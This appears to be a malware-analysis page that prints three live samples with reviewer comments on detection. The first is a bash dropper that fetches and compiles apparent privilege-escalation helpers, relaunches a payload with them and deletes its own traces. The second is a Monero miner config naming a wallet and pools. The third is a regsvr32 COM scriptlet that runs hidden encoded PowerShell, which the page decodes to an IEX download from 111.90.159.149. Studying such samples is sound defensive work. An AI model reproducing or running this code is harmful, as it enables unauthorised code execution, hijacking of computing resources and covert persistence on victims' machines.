#   kernel < 3.10 gate suggests dc/fs are local privilege-escalation helpers -- confirm
#   by analysing the ELFs; nothing on this page shows their internals.
# Detection: gcc invoked on /tmp or /usr/bin/dc_name.c, files named just4run,
# aW1yb290.dat / aW1yb291.dat, and a 30 s sleep between marker creation and relaunch.
# Globals read: CFIM*, DownloadPath, root_path, dc_name, fs_name, arg, URL globals
#######################################
function fuckit() {
gcc --help >/dev/null 2>&1
if [ "$?" = "0" ]; then
DownloadFile "$CFIM" "$CFIM_DC_CODE_VALUE" "$dc_code_url" "$DownloadPath$dc_name.c"
`gcc $DownloadPath$dc_name.c -o $DownloadPath$dc_name -pthread >/dev/null 2>&1`
if [ "$?" != "0" ]; then
DownloadFile "$CFIM" "$CFIM_DC_ELF_VALUE" "$DC_ELF_DOWNLOAD_URL" "$DownloadPath$dc_name"
fi
DownloadFile "$CFIM" "$CFIM_FS_ELF_VALUE" "$fs_elf_64" "$DownloadPath$fs_name"
else
DownloadFile "$CFIM" "$CFIM_DC_ELF_VALUE" "$DC_ELF_DOWNLOAD_URL" "$DownloadPath$dc_name"
DownloadFile "$CFIM" "$CFIM_FS_ELF_VALUE" "$fs_elf_64" "$DownloadPath$fs_name"
fi
chmod 755 $DownloadPath$dc_name
chmod 755 $DownloadPath$fs_name
# Probe fs_name first: command on stdin, success judged by the marker file appearing.
tmp1="aW1yb290.dat"
temp_path=$root_path$tmp1
echo "echo fuckedall > $temp_path" | $DownloadPath$fs_name
if [ -f "$temp_path" ]; then
sleep 30
tmp1="just4run"
temp_path=$DownloadPath$tmp1
echo "cp $arg $temp_path;chmod 755 $temp_path;(exec $temp_path &> /dev/null &)" | $DownloadPath$fs_name
else
# fs_name did not work: try dc_name, but on CentOS only when the kernel is < 3.10.
local line
line=`head -n 1 /etc/issue`
if echo $line|grep "[Cc]ent[Oo][Ss]" >/dev/null; then
if [[ "$(uname -r)" < 3.10* ]]; then
tmp1="aW1yb291.dat"
temp_path=$root_path$tmp1
echo "echo fuckedall > $temp_path" | $DownloadPath$dc_name
if [ -f "$temp_path" ]; then
sleep 30
tmp1="just4run"
temp_path=$DownloadPath$tmp1
echo "cp $arg $temp_path;chmod 755 $temp_path;(exec $temp_path &> /dev/null &);" | $DownloadPath$dc_name
fi
fi
else
tmp1="aW1yb291.dat"
temp_path=$root_path$tmp1
echo "echo fuckedall > $temp_path" | $DownloadPath$dc_name
if [ -f "$temp_path" ]; then
sleep 30
tmp1="just4run"
temp_path=$DownloadPath$tmp1
echo "cp $arg $temp_path;chmod 755 $temp_path;(exec $temp_path &> /dev/null &);" | $DownloadPath$dc_name
fi
fi
fi
}
#######################################
# Anti-forensic cleanup: deletes the helpers, the C source, the marker files, /tmp/bak,
# the running script itself ($0) and the original payload path ($arg).
# Note the marker files are removed from $DownloadPath here although fuckit() wrote
# them under $root_path (/tmp/), so on most hosts those two may survive -- useful
# forensic artefacts. `$"dc_name.c"` is bash locale-translation syntax and expands to
# the literal "dc_name.c".
# Globals read: DownloadPath, dc_name, fs_name, arg
#######################################
function clearnup() {
rm -f $DownloadPath$dc_name
rm -f $DownloadPath$fs_name
rm -f $DownloadPath$"dc_name.c"
rm -f $DownloadPath"aW1yb290.dat"
rm -f $DownloadPath"aW1yb291.dat"
rm -f /tmp/bak
rm -f $0
rm -f $arg
}
#######################################
# Entry point: choose C2 address, fingerprint the host, fetch/run helpers, wipe traces.
# None of the stages returns a status that main() acts on.
#######################################
function main() {
CheckNetwork
init
fuckit
clearnup
}
# Runs unconditionally on load; $1 (the path to relaunch and delete) is read via $arg above.
main
## 1575263e0e1bd98c5b9caa919546d864ab9102c95c2df1d1f291370f85c288d9
{
"algo": "cryptonight",
"background": true,
"colors": false,
"retries": 5,
"retry-pause": 5,
"donate-level": 1,
"syslog": false,
"log-file": null,
"print-time": 60,
"av": 0,
"safe": false,
"max-cpu-usage": 75,
"cpu-priority": null,
"threads": null,
"pools": [
{
"url": "xmr-eu1.nanopool.org:14444",
"user": "41mmoPVT1EFTaq3R4RpWEWiFJufAqJk8bAHBheSDVSGLgorjJHTNemdNg3kocA2Hj66Cve8B9fVEuYY6ztctk1bAETqsnNk",
"pass": "x",
"keepalive": true,
"nicehash": false,
"variant": -1
},
{
"url": "xmr-eu2.nanopool.org:14444",
"user": "41mmoPVT1EFTaq3R4RpWEWiFJufAqJk8bAHBheSDVSGLgorjJHTNemdNg3kocA2Hj66Cve8B9fVEuYY6ztctk1bAETqsnNk",
"pass": "x",
"keepalive": true,
"nicehash": false,
"variant": -1
},
{
"url": "xmr-us-east1.nanopool.org:14444",
"user": "41mmoPVT1EFTaq3R4RpWEWiFJufAqJk8bAHBheSDVSGLgorjJHTNemdNg3kocA2Hj66Cve8B9fVEuYY6ztctk1bAETqsnNk",
"pass": "x",
"keepalive": true,
"nicehash": false,
"variant": -1
},
{
"url": "xmr-us-west1.nanopool.org:14444",
"user": "41mmoPVT1EFTaq3R4RpWEWiFJufAqJk8bAHBheSDVSGLgorjJHTNemdNg3kocA2Hj66Cve8B9fVEuYY6ztctk1bAETqsnNk",
"pass": "x",
"keepalive": true,
"nicehash": false,
"variant": -1
},
{
"url": "xmr-asia1.nanopool.org:14444",
"user": "41mmoPVT1EFTaq3R4RpWEWiFJufAqJk8bAHBheSDVSGLgorjJHTNemdNg3kocA2Hj66Cve8B9fVEuYY6ztctk1bAETqsnNk",
"pass": "x",
"keepalive": true,
"nicehash": false,
"variant": -1
},
{
"url": "pool.minexmr.com:80",
"user": "41mmoPVT1EFTaq3R4RpWEWiFJufAqJk8bAHBheSDVSGLgorjJHTNemdNg3kocA2Hj66Cve8B9fVEuYY6ztctk1bAETqsnNk",
"pass": "x",
"keepalive": true,
"nicehash": false,
"variant": -1
},
{
"url": "78.46.91.134:80",
"user": "41mmoPVT1EFTaq3R4RpWEWiFJufAqJk8bAHBheSDVSGLgorjJHTNemdNg3kocA2Hj66Cve8B9fVEuYY6ztctk1bAETqsnNk",
"pass": "x",
"keepalive": true,
"nicehash": false,
"variant": -1
},
],
"api": {
"port": 0,
"access-token": null,
"worker-id": null
}
}
## ea64b5f314824c19ad91184e3607956addff47712f763a024b775f34b0a256c6
<?XML version="1.0"?>
<scriptlet>
<!-- Reviewer note: COM scriptlet (.sct) stage, kept byte-for-byte apart from comments.
     When registered (typically via regsvr32.exe and scrobj.dll, MITRE T1218.010) the
     JScript below launches a hidden, base64-encoded PowerShell one-liner; the decoded
     command, given after this listing on the page, is an IEX download of
     http://111.90.159.149/vercheck.ps1.
     Detection: regsvr32.exe or another scriptlet host spawning cmd.exe -> powershell.exe
     with -nop -noni -w hidden -enc, and outbound HTTP to 111.90.159.149. -->
<registration
progid="Test"
classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Learn from Casey Smith @subTee -->
<script language="JScript">
<![CDATA[
// ps: the -enc value is UTF-16LE base64; see the decoded form on this page.
ps = "cmd.exe /c powershell.exe -nop -noni -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADEAMQAuADkAMAAuADEANQA5AC4AMQA0ADkALwB2AGUAcgBjAGgAZQBjAGsALgBwAHMAMQAnACkAKQAKAA==";
// WScript.Shell.Run with window style 0 (hidden) and wait-on-return true.
new ActiveXObject("WScript.Shell").Run(ps,0,true);
]]>
</script>
</registration>
</scriptlet>
## decodes to:
ps = "cmd.exe /c powershell.exe -nop -noni -w hidden -enc IEX ((new-object net.webclient).downloadstring('http://111.90.159.149/vercheck.ps1'))